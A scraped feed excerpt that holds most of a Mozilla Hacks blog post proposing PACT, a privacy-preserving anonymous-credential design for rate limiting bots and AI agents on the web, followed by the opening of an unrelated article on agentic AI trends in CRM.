<p class="c21"><span class="c0">Unfortunately, that tooling is increasingly failing at both tasks. Browser privacy protections are </span><span class="c3 c1"><a class="c5" href="https://blog.mozilla.org/en/firefox/fingerprinting-protections/">dismantling</a></span><span class="c0"> the passive signals that anti-abuse systems depended on to identify and distinguish </span><span class="c0">visitors</span><span class="c0">. Meanwhile advances in generative AI have rendered CAPTCHAs ineffective: bots now solve them </span><span class="c3 c1"><a class="c5" href="https://www.usenix.org/system/files/usenixsecurity23-searles.pdf">faster and more reliably</a></span><span class="c0"> than </span><span class="c0">humans</span><span class="c0">. </span></p>
<p class="c33"><span class="c0">Many sites are switching to more invasive mechanisms and now ask visitors to disclose </span><span class="c1">identifying information</span><span class="c0">,</span><span class="c0"> e.g. an email address, a federated login or </span><span class="c1">disabling their VPN</span><span class="c0">. This means greater friction for users, since providing these details on a first visit takes time. It also compromises their privacy, since these details enable the same kinds of cross-site tracking that browser privacy protections were intended to mitigate. </span></p>
<p class="c38"><span class="c0">This </span><span class="c1">leaves</span><span class="c0"> users </span><span class="c1">with a</span><span class="c0"> dilemma. The more effectively they protect their privacy, the harder it is for websites to distinguish them from bots and the worse the treatment they receive. Website operators are also suffering. The additional friction they inflict upon well-behaved visitors harms their site, but many are willing to pay the costs if it mitigates volumetric abuse. </span></p>
<p class="c44"><span class="c1">Browser-based AI agents make this tension more acute. Sites may want to allow agents which are acting on behalf of individual users while blocking agents engaged in volumetric abuse. However, with no effective mechanisms to distinguish the two, websites are opting to block </span><span class="c17 c1"><a class="c5" href="https://dl.acm.org/doi/epdf/10.1145/3730567.3732913">both</a></span><span class="c0">. That hurts users, who should be free to choose the user agent they use to access the web; it hurts new browsers and agents, which struggle to interoperate; and it hurts sites, which lose legitimate visitors.</span></p>
<p class="c30"><span class="c0">The consequence is that the web gets worse for everyone. Users get more friction or less privacy or both. Website operators see more volumetric abuse and the friction they add drives away users </span><span class="c1">who</span><span class="c0"> would otherwise want to consume their content or services. New user</span><span class="c1"> </span><span class="c0">agents struggle to access the same content as conventional browsers. </span></p>
<h3 class="c12"><span class="c20 c1">The</span><span class="c20 c1"> Costs of </span><span class="c2 c1">Convenient</span><span class="c2 c1"> Solutions</span></h3>
<p class="c9"><span class="c0">Some large ecosystem players have put forward solutions that leverage their control of the dominant operating systems and their deep integration with consumer hardware. These rely on device attestation: identifiers and privileged code baked into devices at the hardware level, which let manufacturers prove what software is running on a user’s device. Exposing this functionality to the web means attesting to sites that the user is running approved software with trusted hardware and therefore isn’t a bot. There have been two substantive proposals.</span></p>
<p class="c9"><span class="c0">Google’s Web Environment Integrity, <a href="https://www.theregister.com/software/2023/11/02/google-abandons-web-environment-integrity-api-proposal/335969">abandoned in 2023</a>, was the blunt version. It attested to the user agent itself, as well as the operating system and device in use. Users would have lost control in two ways: once to the attester, which would decide which operating systems and devices could be blessed, and again to the website, which would decide which software to accept. If sites had adopted allow-lists of approved user agents, building a new browser would have become virtually impossible, and sites could have withdrawn access from any user agent they chose.</span></p>
<p class="c9"><span class="c0">Apple’s Private Access Tokens, <a href="https://developer.apple.com/news/?id=huqjyh7k">deployed</a> across their ecosystem in 2022, have more subtle issues. Built on the Privacy Pass protocol standardized at the IETF, they get a lot right: a user receives a renewed, limited batch of one-time tokens that can be presented to websites without linking their visits together. This provides privacy for users and has shown rate limits to be an effective tool for sites – both points we’ll return to later in this post.</span></p>
<p class="c9"><span class="c1">However, Private Access Tokens rely on device attestation, requiring that the hardware manufacturer be in overall control of the user’s device. Presenting a PAT tells a website you are locked into Apple’s rules for what counts as acceptable software. </span><span class="c1">Due to PAT’s technical design</span><sup class="c1"><a href="https://hacks.mozilla.org/?p=48374#:~:text=PAT%20requires">[1]</a></sup><span class="c1">, there’s no way to open the system to other sources of scarcity without compromising the system’s privacy properties, meaning that if more widely deployed, access to the web would</span><span class="c1"> become tied to having bought expensive hardware from a small, hard to change set of vendors</span><span class="c1">. </span></p>
<p class="c9"><span class="c1">Both approaches are ultimately hostile to users and to the openness of the web. Both are premised on parts of a user’s device that sit within the manufacturer’s control and beyond the user’s own. Were they widely deployed, the web would become just another walled garden with centralized gatekeepers controlling acceptable hardware, operating systems and software. As convenient as these solutions are for the players who already dominate the ecosystem, we think there’s a better path.</span></p>
<h3 class="c24"><span class="c2 c1">A Better Path Forward </span></h3>
<p class="c24"><span class="c1">Bots’ harms arise from their ability to operate beyond human scale. For sites to prevent volumetric abuse they</span><span class="c0"> don’t actually need to know </span><span class="c1">the user’s</span><span class="c0"> identity or </span><span class="c1">receive cryptographic</span><span class="c0"> proof that they’re running approved softwar</span><span class="c1">e. If sites knew their visitors were restricted to a rate </span><span class="c1">limit</span><span class="c1"> set by a site, that would be enough.  </span></p>
<p class="c34"><span class="c1">Rate limits</span><span class="c0"> only make sense if </span><span class="c1">they’re</span><span class="c0"> </span><span class="c1">tied to</span><span class="c0"> something scarce; something an attacker can’t cheaply replicate to evade the limit. </span><span class="c0">Without anchoring to a scarce resource, like the trusted hardware used in Private Access Tokens, attackers can generate as many fresh identities as they need to bypass the rate limit. </span></p>
<p class="c56"><span class="c1">However, </span><span class="c0">hardware is just one option for </span><span class="c1">scarcity</span><span class="c0">. Anything a user already has that an attacker can’t trivially spin up at scale will work</span><span class="c1">: e</span><span class="c0">mail addresses and phone numbers are naturally scarce</span><span class="c1">. A paid subscription costs an attacker the same as a real user.  </span><span class="c0">Even maintaining an account on a free service requires </span><span class="c1">some</span><span class="c0"> non-trivial work. </span></p>
<p class="c39"><span class="c0">What if we could use these scarce signals across the web? We</span><span class="c1"> could build </span><span class="c0">an open ecosystem with many parties offering scarcity signals, each site choosing which to accept. By </span><span class="c0">opening up who can provide a signal, and letting sites choose which to accept, we can avoid transferring control to device manufacturers and the resulting harms. </span></p>
<p class="c39"><span class="c1">As a concrete example of who might be well positioned to provide such a signal, we can consider VPN providers acting as a subscription service. Sites routinely block VPN users indiscriminately, whether through a deliberate policy choice or through an indirect consequence of rate limiting visitors per IP address. But a VPN subscription is a perfect source of scarcity. If the VPN provider could vouch for its users so that sites could rate limit each user individually – then users would be able to browse the web with less friction and without giving up their VPN usage. </span></p>
<p class="c35"><span class="c0">The catch is that building </span><span class="c1">a system that can enable this</span><span class="c0"> on the open web whilst </span><span class="c1">maintaining user’s privacy</span><span class="c0"> is genuinely difficult. </span><span class="c1">It requires that we take information from one site — that this user holds some scarce thing — and expose it to other sites so that they can use that as the basis for their rate limiting. </span><span class="c0">Letting one site verify a signal from another is </span><span class="c1">the sort of </span><span class="c0">information flow</span><span class="c1"> </span><span class="c0">that privacy-pr</span><span class="c1">eserving </span><span class="c0">browsers have spent the last decade locking down to </span><span class="c1">prevent cross-site tracking</span><span class="c0">. </span></p>
<p class="c35"><span class="c1">Our goal would be that no more than the minimum information gets through: a single bit communicating whether the user is below the rate limit set by the site. Leaking anything more – like the source of the scarcity that the rate limit is anchored to – would be unacceptable. Enabling a new cross-site information flow might feel like compromising privacy to gain better access, but reality is more nuanced. If a new system moves sites away from demanding that visitors be identifiable (whether through fingerprinting or login forms), </span><span class="c1">it can be a win for both privacy and access.</span></p>
<h3 class="c24"><span class="c2 c1">The Foundations </span></h3>
<p class="c50"><span class="c0">The good news is that the cryptographic foundations for a privacy preserving approach already exist. The </span><span class="c1 c3"><a class="c5" href="https://privacypass.github.io/">Privacy Pass protocol</a></span><span class="c3 c1"><a class="c5" href="https://www.google.com/url?q=https://privacypass.github.io/&amp;sa=D&amp;source=editors&amp;ust=1782228494401139&amp;usg=AOvVaw3uoXdqARBZKjQF5H8uwYKY">,</a></span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://www.petsymposium.org/2018/files/papers/issue3/popets-2018-0026.pdf">originally developed in 2018</a></span><span class="c0"> to reduce the friction of Cloudflare CAPTCHAs for Tor users, introduced the core primitive: a token that is </span><span class="c13 c11 c1">unlinkable </span><span class="c0">between issuance and redemption. You prove something to an issuer (e.g. by </span><span class="c1">solving a CAPTCHA</span><span class="c0">), receive some tokens, and later present a token to a website. The website can verify the token is legitimate, but can’t link it to the user it was issued to. </span></p>
<p><img alt="A diagram showing the protocol flow for Privacy Pass." class="aligncenter size-full wp-image-48375" height="1639" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-1.excalidraw1-scaled.png" width="2560"></p>
<p class="c27"><img alt="" title=""><span class="c20 c1 c57"><strong>Figure 1</strong>: </span><span class="c0"><em>In Privacy Pass, a CAPTCHA provider can issue tokens to a client which can then be used to bypass challenges for future site visits. Even if the CAPTCHA provider and sites collude, they can’t use the tokens to identify the user or their browsing history.</em> </span></p>
<p class="c52"><span class="c0">Privacy Pass has gone on to be successfully deployed in systems where the issuer and verifier have a prior trust relationship: </span><span class="c0">Apple</span><span class="c0"> uses it to authenticate users of </span><span class="c3 c1"><a class="c5" href="https://hacks.mozilla.org/feed/">Private Cloud Compute</a></span><span class="c0"> </span><span class="c1">and</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://www.apple.com/privacy/docs/iCloud_Private_Relay_Overview_Dec2021.PDF">Private Rel</a></span><span class="c17 c1"><a class="c5" href="https://www.google.com/url?q=https://www.apple.com/privacy/docs/iCloud_Private_Relay_Overview_Dec2021.PDF&amp;sa=D&amp;source=editors&amp;ust=1782228494402463&amp;usg=AOvVaw0KGoiSPg-8NLvNvIiSSbPt">ay</a></span><span class="c1"> </span><span class="c0">without linking their activity to their identity, </span><span class="c0">Chrome</span><span class="c0"> uses it for </span><span class="c3 c1"><a class="c5" href="https://github.com/GoogleChrome/ip-protection">two-hop IP protection</a></span><span class="c0">, and </span><span class="c0">Kagi</span><span class="c0"> uses it to provide </span><span class="c17 c1"><a class="c5" href="https://help.kagi.com/kagi/privacy/privacy-pass.html">private search</a></span><span class="c0">. </span><span class="c0">These deployments work in part because a small number of parties have agreed in advance on who issues tokens and who accepts them. </span></p>
<p class="c18"><span class="c0">Applying this approach to an open system where any site can act as</span><span class="c0"> an issuer</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://docs.google.com/document/d/1k3QJG2D_Sq4zJiJRn9DfY80hEHuz9UWrJdTt8LbRsMM/edit?tab=t.0#heading=h.r8jxzjcoeumo">brings real challenges</a></span><span class="c0">.</span><span class="c0"> Firstly, even though tokens are unlinkable, knowing a user has access to a specific issuer is a privacy leak on its own, because you can infer that the user meets the relevant issuance criteria. </span><span class="c1">If one site can learn that you have a token from another site, that reveals that you have been to that site, which can be a major privacy problem. </span><span class="c0">This compounds if </span><span class="c1">sites </span><span class="c0">can learn the set of issuers </span><span class="c1">you have visited</span><span class="c0">, since it becomes a fingerprint which can be used to identify </span><span class="c1">you</span><span class="c0">. </span></p>
<p class="c8"><span class="c3 c1"><a class="c5" href="https://blog.cryptographyengineering.com/2014/11/27/zero-knowledge-proofs-illustrated-primer/">Generic techniques</a></span><span class="c0"> exist for proving a statement in zero knowledge: we can prove that </span><span class="c1">a client</span><span class="c0"> ha</span><span class="c1">s</span><span class="c0"> a token from a set of acceptable issuers without revealing which specific issuer it is. We’ll call this issuer blinding. </span><span class="c0">The generic approach is often slow, but </span><span class="c3 c1"><a class="c5" href="https://www.ietf.org/archive/id/draft-orru-zkproof-sigma-protocols-01.html">bespoke approaches</a></span><span class="c0"> tailored to the underlying cryptography can improve this considerably. </span></p>
<p class="c54"><span class="c0">Another challenge is how sites using rate limits decide who to trust to issue tokens. If an issuer misbehaves then the site’s rate limits become ineffective, enabling volumetric abuse. However, if we need to prevent the site from learning which issuers a user has access to, the site is only going to know that one of its trusted issuers was used, not which one. This makes mistakes or misbehaviour by an issuer difficult to detect, and makes it hard for sites to evaluate new issuers. Solving this challenge is essential for openness. Without adequate information, </span><span class="c0">sites are likely to lean towards conservative issuer selection. </span><span class="c1">That could lead to less choice between Anchors, which in turn could lead to a new form of gatekeeper being created.</span><span class="c0"> </span></p>
<p class="c32"><span class="c0">To solve this, sites at least need a way to calculate an aggregate score for each issuer they use. This should roughly correspond to how much of the traffic it considers abusive to have come from users using that particular issuer. Mozilla has long invested in systems like </span><span class="c3 c1"><a class="c5" href="https://blog.mozilla.org/en/firefox/partnership-ohttp-prio/">Prio</a></span><span class="c0"> which use multiparty computation (MPC) to protect user privacy whilst enabling aggregate measurements of system behaviour. </span></p>
<p class="c59"><span class="c0">Privacy Pass also struggles to handle dynamic adjustments to rate limits. Once tokens have been issued, they’re difficult to invalidate without either revoking all active tokens or risking attacks which can compromise the privacy of users. It’s also beneficial if sites can adjust rate limits on a per </span><span class="c1">client</span><span class="c0"> basis, for example by increasing rate limits where they become more confident the </span><span class="c1">client</span><span class="c0"> is benign and withdrawing access </span><span class="c1">when abuse is detected</span><span class="c0">. </span></p>
<p class="c47"><span class="c3 c1"><a class="c5" href="https://www.ietf.org/archive/id/draft-schlesinger-cfrg-act-00.html">Anonymous Credit Tokens</a></span><span class="c0"> </span><span class="c0">offer a useful building block to solve this problem. Conventional Privacy Pass schemes rely on issuing a bucket of tokens but ACT works differently by enabling the use of a credential with state. For example, an ACT credential can hold an internal counter. When the credential is presented, the site can check the counter is over some threshold and mutate it, increasing or decreasing </span><span class="c1">the counter whenever</span><span class="c0"> the site’s perception of the holder has improved or worsened. Critically, the exact value is never leaked to the site, preventing the site from tracking the holder and ensuring successive presentations of the same credential can’t be linked. </span></p>
<h3 class="c24"><span class="c2 c1">Putting it together </span></h3>
<p class="c19"><span class="c1">So how can we combine these techniques to build a system which can enable privacy-preserving rate limiting on the open web? In May 2026, we participated in a </span><a href="https://pactworkshop.com/"><span class="c17 c1">W3C CG Meeting</span></a><span class="c0"> in collaboration with Cloudflare, Chrome and other web stakeholders in which we started sketching out a design we’re calling PACT – Private Access Control Tokens. </span></p>
<p class="c19"><span class="c0">Rate limits need a starting point, a source of scarcity to anchor on. We’ll call an entity that provides such a source an </span><span class="c2 c1">Anchor</span><span class="c0">. To a user who meets the Anchor’s criteria, like having a subscription,</span><span class="c0"> an account in good standing</span><span class="c0">, or a verified phone number, an Anchor issues a batch of </span><span class="c2 c1">Endorsement </span><span class="c0">tokens, following the Privacy Pass model. In practice, Anchors could be any website which has access to this kind of signal. An Endorsement conveys</span><span class="c1"> </span><span class="c0">scarcity to other sites. </span></p>
<p class="c51"><span class="c0">That’s enough for a simple system where access is </span><span class="c1">either granted or denied</span><span class="c0">. But as we discussed earlier, we also want the ability to increase access where a visitor behaves benignly and decrease it where they don’t. </span><span class="c1">The state needed to enforce a rate limit</span><span class="c0"> can’t live in the Endorsement, because Endorsements cross trust boundaries between unrelated sites. We need a second object that can hold that state, scoped to the party that maintains it. </span></p>
<p class="c48"><span class="c0">We’ll call that the party that handles rate limiting for a site a </span><span class="c2 c1">Moderator </span><span class="c0">and the stateful object a </span><span class="c2 c1">Credential</span><span class="c0">. </span><span class="c1">A Credential is specific to a Moderator and, unlike endorsements, we limit each site to nominating a single Moderator. In the common case the site itself plays the Moderator role, so there’s no new entity or trust boundary. </span><span class="c1">A Moderator can also be a third-party service shared across many sites, allowing those sites to cooperatively share a rate limit.</span><span class="c0"> </span></p>
<p class="c48"><span class="c0">In the terminology of the previous section, the Anchor is the issuer of Endorsements, and the Moderator both verifies Endorsements and issues Credentials. A Moderator manages rate-limit policy: it decides which Anchors it trusts, accepts their Endorsements, and issues a Credential in return.</span></p>
<p class="c14"><img alt="" title=""><img alt="A diagram showing an overview of the PACT system" class="aligncenter size-full wp-image-48381" height="1655" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-5.excalidraw21-scaled.png" width="2560"></p>
<p class="c14"><strong><span class="c1 c20">Figure 2: </span></strong><span class="c1"><em>(1) Clients acquire Endorsements from Anchors in the course of normal browsing to sites they have relationships with. (2) Clients can exchange Endorsements for a stateful Credential from a Moderator. (3) Credentials can be used to access sites which use that Moderator. Credentials can be updated over time.</em> </span></p>
<p class="c41"><span class="c0">Directly revealing which Anchor backed an Endorsement would leak a lot of information about the user. The issuer blinding techniques from the previous section solve this: when an Endorsement is redeemed, the Moderator only learns that it came from one of </span><span class="c1">the </span><span class="c0">Anchors it trusts, but not which one. </span></p>
<p class="c28"><span class="c0">When a Moderator covers more than one site, we let Credentials be presented across all of them but partition cookies and storage as</span><span class="c1"> we would for any other third party site</span><span class="c0">. The unlinkability of </span><span class="c1">Credential</span><span class="c0"> presentations keeps this from creating a new cross-site identifier. The benefit is that good behaviour on one site improves access on every site the Moderator covers, and bad behaviour cuts it everywhere. Websites can already build the same capability with a shared account system, so this doesn’t create a new way to lock users out, but it </span><span class="c1">does provide a</span><span class="c0"> new way to grant access without requiring users to give up their privacy. </span></p>
<p class="c28"><span class="c0">Enabling Moderators that cover many sites carries a centralisation risk, simila</span><span class="c1">r </span><span class="c0">to the concentration we see today in anti-abuse providers. The mitigation is that the choice of Moderator stays with each site, and the choice of trusted Anchors stays with each Moderator. Th</span><span class="c1">is</span><span class="c0"> </span><span class="c1">can’t</span><span class="c0"> reverse the centralisation pressure the web already faces, but it </span><span class="c1">ensures this system won’t lead to additional lock-in</span><span class="c0">: a new Anchor or a new Moderator can be adopted without coordinating with a dominant vendor. </span></p>
<p class="c46"><span class="c0">The </span><span class="c1">system then has three flows</span><span class="c0">.</span><span class="c0"> First, the user </span><span class="c1">receives</span><span class="c0"> Endorsements from an Anchor in the course of normal interaction</span><span class="c1">, based on the Anchor’s positive view of the user</span><span class="c0">. This is </span><span class="c0">a relatively rare operation for any given user and Anchor. After all, as our source of scarcity, Endorsements should not be too easy to accumulate.</span></p>
<p class="c10"><img alt="" title=""><img alt="A diagram showing the PACT Anchor Flow" class="aligncenter size-full wp-image-48377" height="1789" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-3.excalidraw1-scaled.png" width="2560"></p>
<p class="c10"><strong><span class="c20 c1">Figure 3</span></strong><span class="c1">: <em>In the course of normal browsing, clients browse to websites they have a relationship with. These sites can act as Anchors by issuing Endorsements to clients.</em></span></p>
<p class="c26"><span class="c0">Second, when the user arrives at a site that works with a Moderator, the browser spends an Endorsement from an Anchor the Moderator trusts and receives a Credential in return. The presentation hides </span><span class="c13 c11 c1">which </span><span class="c0">Anchor was used, and </span><span class="c1">neither the Anchor nor the Moderator can trace the Endorsement back to where it was issued</span><span class="c0">. The Moderator decides what initial balance the Credential starts with. If the user has no Endorsements from suitable Anchors at all, existing mechanisms (CAPTCHAs, account creation, federated login) </span><span class="c1">could be used to</span><span class="c0"> bootstrap a Credential the same way, so the system degrades to today’s experience rather than locking the user out.</span></p>
<p class="c7"><img alt="" title=""><img alt="A diagram showing the protocol flow between Anchors and Moderators" class="aligncenter size-full wp-image-48378" height="1789" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-4.excalidraw1-scaled.png" width="2560"></p>
<p class="c7"><span class="c20 c1"><strong>Figure 4</strong></span><span class="c1"><strong>:</strong><em> When the client browses to a site, it can prompt the client for a Credential from the Moderator it uses. If the Client doesn’t have a suitable Credential, but does have a suitable Endorsement, it can exchange it for a Credential with the Moderator. In practice, the Moderator and the Site might be the same server. </em></span><em><span class="c0"> </span></em></p>
<p class="c25"><span class="c0">Third, as the user browses, the browser presents the Credential and the Moderator updates </span><span class="c1">the internal state of the Credential</span><span class="c0">. The </span><span class="c1">Moderator can reward </span><span class="c0">behaviour that looks benign and </span><span class="c1">penalize suspicious activity</span><span class="c0">, </span><span class="c1">but can’t track the use of the Credential or identify it if it’s used on other sites the Moderator covers</span><span class="c0">. </span><span class="c0">Revocation falls out of the same mechanism: a Moderator </span><span class="c1">can refuse to return an updated Credential</span><span class="c0">.</span><span class="c0"> </span></p>
<p class="c7"><img alt="" title=""><img alt="A diagram showing the PACT Moderator Flow" class="aligncenter size-full wp-image-48379" height="1618" src="https://hacks.mozilla.org/wp-content/uploads/2026/06/pact-drawings-5.excalidraw1-scaled.png" width="2560"></p>
<p class="c7"><strong><span class="c20 c1">Figure 5</span></strong><span class="c0"><strong>:</strong> <em>The Client can present the Credential on sites which use the matching Moderator. Sites can check if the Credential is in good standing. The sites can then adjust the access the Credential has in response to behaviour. E.g. increasing it when they gain confidence in the client or reducing it in response to malicious behaviour.</em></span></p>
<p class="c23"><span class="c0">In practice, all of this would happen transparently to the user through a WebAPI that sites acting as Anchors or Moderators would call from JavaScript. In an ideal ecosystem, users would accumulate Endorsements through normal browsing, just by virtue of the sites they already visit, and the rest of the flow would happen in the background as they move around the web, leaving </span><span class="c1">users</span><span class="c0"> with meaningfully less friction. </span></p>
<p class="c16"><span class="c0">AI agents acting on behalf of a user slot into the same flow. An agent can carry its user’s Credentials, in which case the user remains accountable for how the agent </span><span class="c1">behaves.</span><span class="c0"> </span><span class="c1">S</span><span class="c0">ites would not need to grant any more access than they would to the user themselves. Alternatively, the operator of an agent can run its own Anchor and vouch for its agents the way other Anchors vouch for human users. </span><span class="c0">Sites retain control over which Anchors they accept, so they can choose how to treat agent traffic without needing a separate detection mechanism. </span></p>
<p class="c6"><span class="c0">Several mechanisms combine to keep the information about a user that flows out close to a single bit. Cryptographic unlinkability ensures successive Credential presentations cannot be tied to each other or to the original issuance, so a user’s visits cannot be </span><span class="c1">joined</span><span class="c0"> into a history. Each site is bound to a single Moderator, so the set of Moderators a user has Credentials with never becomes a cross-site fingerprint. The Anchor-to-Credential exchange happens in an isolated browsing context, so during ordinary browsing the only thing the site or its Moderator ever observes is a Credential presentation: </span><span class="c1">the site only learns if </span><span class="c0">the user has a valid Credential below the rate limit, or </span><span class="c1">nothing</span><span class="c0">. </span><span class="c1">W</span><span class="c0">hen the Moderator updates a </span><span class="c1">Credential</span><span class="c0">, it</span><span class="c0"> adjusts the credentials state without learning what it is.</span></p>
<p class="c6"><span class="c1">The additional privacy given to users from </span><span class="c0">Issuer blinding</span><span class="c1"> makes participating in the system more challenging for Moderators</span><span class="c0">. Because the Moderator can’t see which Anchor backed a Credential at issuance, it can’t give a Credential from a strong Anchor </span><span class="c1">more access</span><span class="c0"> than one from a weak Anchor: doing so would itself leak which Anchor was used. The initial </span><span class="c1">access</span><span class="c0"> has to be uniform across the Moderator’s whole pool of Anchors, which in practice means setting it at the strength of the weakest. </span><span class="c1">However, this is only relevant for that initial access, the Moderator can update credentials according to the holder’s behavior, enabling Credential’s to accrue access over time.</span></p>
<p class="c42"><span class="c0">Building an open ecosystem also requires that sites can make effective decisions about the Anchors they choose to trust</span><span class="c1">. M</span><span class="c0">ultiparty computation systems like </span><span class="c0">Prio</span><span class="c0"> enable aggregate scoring without compromising pr</span><span class="c1">ivacy</span><span class="c0">. When users present Credentials, they can provide an encrypted share which identifies the anchor they use</span><span class="c1">d and can be privately aggregated to compute the quality of an issuer.</span></p>
<h3 class="c24"><span class="c2 c1">Next Steps </span></h3>
<p class="c49"><span class="c1">We think the</span><span class="c0"> architecture we</span><span class="c1">’ve </span><span class="c0">sketched </span><span class="c1">for PACT </span><span class="c0">has the right shape, but many of the details still need to be worked out</span><span class="c1"> and the entire system needs rigorous privacy and security analysis.</span></p>
<p class="c45"><span class="c0">We want to do that work in the open. The IETF is the natural venue for the cryptographic protocols underneath, and the W3C for the WebAPI surface that sits on top. </span><span class="c0">We’ll be </span><span class="c1">bringing</span><span class="c0"> </span><span class="c3 c1"><a class="c5" href="https://github.com/Moderation-of-unLinkable-Endorsements">draft specifications</a></span><span class="c1"> to these bodies as soon as they’re ready</span><span class="c0">, and we welcome collaborators from across the ecosystem: browser vendors, site operators, anti-abuse providers, and the cryptography community. </span></p>
<p class="c29"><span class="c0">If successful, we think we can provide a system which will keep the web open and </span><span class="c1">private</span><span class="c0">, while still giving sites the rate-limiting signal they need. </span></p>
<h3 class="c29"><span class="c2 c1">Acknowledgements</span></h3>
<p class="c4"><em><span class="c11 c1">The ideas described here are the result of collaboration and conversations with many people, including: Watson Ladd, Thibault Meunier, Michele Orrù, Trevor Perrin, Eric Rescorla, Samuel Schlesinger, Martin Thomson, Eric Trouton, Benjamin Vandersloot &amp; Cathie Yun.</span></em><span class="c11 c1"><em> </em> </span></p>
<hr class="c58">
<div>
<p class="c31"><a href="https://hacks.mozilla.org/?p=48374#:~:text=%5B1%5D">[1]</a><span class="c0"> PAT requires that the source of scarcity and an independent issuer be trusted not to collude. If they do, they can track users as they interact with the system. This is not suitable in the context of an open system where any party could play those two roles.</span></p>
</div>
<p>The post <a href="https://hacks.mozilla.org/2026/06/pact-anonymous-credentials-for-the-web/">PACT: Anonymous Credentials for the Web</a> appeared first on <a href="https://hacks.mozilla.org/">Mozilla Hacks - the Web developer blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[7 CRM trends for 2026: AI brings decisive action to customer workflows]]></title>
<description><![CDATA[Agentic AI has advanced from the promises-and-pilots phase of 2025 to reality and rollouts in 2026. In the process, agentic AI is transforming virtually every aspect of customer relationship management (CRM), the platform that manages sales, marketing, and customer service.



“Last year, everybo...]]></description>
<link>https://tsecurity.de/de/3693117/it-nachrichten/7-crm-trends-for-2026-ai-brings-decisive-action-to-customer-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693117/it-nachrichten/7-crm-trends-for-2026-ai-brings-decisive-action-to-customer-workflows/</guid>
<pubDate>Sat, 25 Jul 2026 06:53:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Agentic AI has advanced from the promises-and-pilots phase of 2025 to reality and rollouts in 2026. In the process, agentic AI is transforming virtually every aspect of <a href="https://www.cio.com/article/272365/what-is-crm-software-for-managing-customer-data.html">customer relationship management (CRM)</a>, the platform that manages sales, marketing, and customer service.</p>



<p class="wp-block-paragraph">“Last year, everybody was dipping their toes into the water,” says <a href="https://futurumgroup.com/keith-kirkpatrick/">Keith Kirkpatrick</a>, research director at The Futurum Group. This year, agentic AI has built momentum from the boardroom down, with companies recognizing that having an AI strategy is imperative. “They feel like if they don’t embrace it now, their competitors will.”</p>



<p class="wp-block-paragraph"><a href="https://www.deloitte.com/global/en/about/people/profiles.gx-harry-datwani+f20748dc.html">Harry Datwani</a>, a principal at Deloitte Digital, adds that enterprise CRM customers have transitioned from “proof of concept” to “scale and execution.”</p>



<p class="wp-block-paragraph">“Across sales, service, marketing, even in the commerce space, enterprises are really using AI and agentic,” he says.</p>



<p class="wp-block-paragraph">“CRM in 2026 is undergoing a structural shift, not just an incremental evolution,” says Forrester analyst <a href="https://www.forrester.com/analyst-bio/kate-leggett/BIO2629">Kate Leggett</a>, noting that AI is becoming a core part of CRM infrastructure, not just a feature or an add-on. According to Forrester data, around 70% of companies are already using AI in their CRM systems, she says.</p>



<p class="wp-block-paragraph">Here are the hot AI-driven trends in CRM this year.</p>



<h2 class="wp-block-heading">CRM becomes an action hero</h2>



<p class="wp-block-paragraph">CRM platforms have traditionally served as passive, static systems of record. Now, agentic AI is transforming CRM into a powerful, real-time solution that can act autonomously.</p>



<p class="wp-block-paragraph">“Organizations that rethink CRM as a real-time, AI-powered system of action — and embrace agentic AI to handle complex, unpredictable work — are better positioned to deliver exceptional customer experiences,” says IDC analyst <a href="https://my.idc.com/getdoc.jsp?containerId=PRF005191">Neil Ward-Dutton</a>. “This approach not only enhances satisfaction and loyalty but also drives operational efficiency and business agility.”</p>



<p class="wp-block-paragraph">Forrester’s Leggett says that AI-powered CRM platforms have advanced from simple data capture to real-time decision-making and execution. Standard capabilities include next-best action recommendations, call summaries, automated updates, generated emails, knowledge creation, predictive forecasting, and deal scoring.</p>



<p class="wp-block-paragraph">She adds that AI agents can now execute workflows, such as routing cases, sending follow-ups, and updating records (with human oversight). They can also handle end-to-end service and sales tasks autonomously, including case resolutions and sales development activities.</p>



<h2 class="wp-block-heading">Agentic drives workforce changes</h2>



<p class="wp-block-paragraph">AI use in CRM systems is also impacting workforce strategies.</p>



<p class="wp-block-paragraph">“We used to hire for deep expertise,” says Constellation Research analyst <a href="https://www.constellationr.com/user/liz-miller">Liz Miller</a>. “AI has commoditized expertise because I can take all that data from my CRM and train my AI models to go deep, to know everything about any product I’ve ever sold, from what has worked, what hasn’t, every price, every sale.”</p>



<p class="wp-block-paragraph">Now, instead of hiring candidates with deep expertise, organizations are looking for candidates who can go wide. “I can train a model to have deep expertise. What I can’t train for is experience, because experience is what happens when a person has gone broad across a lot of different scenarios and faced complexity across that broad scenario,” says Miller.</p>



<p class="wp-block-paragraph">For example, AI systems can automate many aspects of marketing, Miller notes, but there’s no substitute for creativity: people who can interrogate the data and come up with innovative marketing campaigns that connect with customers.</p>



<p class="wp-block-paragraph"><a href="https://www.servicenow.com/workflow/author/terence-chesire.html">Terence Chesire</a>, group vice president of ServiceNow CRM and industry workflows, says that organizations are using agentic AI to free up team members from repetitive, lower-value activities. Those employees have now moved to higher-level roles “where they’re working on transformational deals rather than just building a spreadsheet.”</p>



<p class="wp-block-paragraph">“That’s what we’re seeing as super-exciting as organizations not just free up people, but the speed and effort reduction and the friction reduction in what they can do,” he adds.</p>



<h2 class="wp-block-heading">Data layer takes center stage</h2>



<p class="wp-block-paragraph">AI’s promise to deliver actionable customer and marketing intelligence has placed even greater emphasis on the importance on sound data management practices for CRM.</p>



<p class="wp-block-paragraph">“The light bulb has flashed on very brightly for our clients,” says Deloitte’s Datwani. “Everyone is talking about AI agents, but your ability to really extract value is inextricably linked to the quality of your data and the ability to make that data accessible. What we’re finding is that despite large investments over time our clients still have fragmented data. And so, they are data rich and insight poor.”</p>



